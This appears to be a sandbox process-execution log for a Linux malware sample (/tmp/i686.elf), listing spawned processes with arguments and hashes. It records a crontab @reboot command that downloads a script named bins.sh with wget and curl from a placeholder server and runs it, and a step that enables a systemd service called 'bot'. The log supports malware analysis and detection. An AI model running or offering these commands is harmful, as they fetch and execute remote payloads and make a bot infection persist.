Start time (UTC): | 23:57:05 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | - |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
Start time (UTC): | 23:57:05 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | - |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | - |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | - |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | - |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/curl |
Arguments: | /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh |
File size: | 239848 bytes |
MD5 hash: | add6bc2195e82c55985ccf49fd4048e6 |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | - |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/systemctl enable bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:11 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/systemctl |
Arguments: | /bin/systemctl enable bot |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 23:57:12 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 23:57:12 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |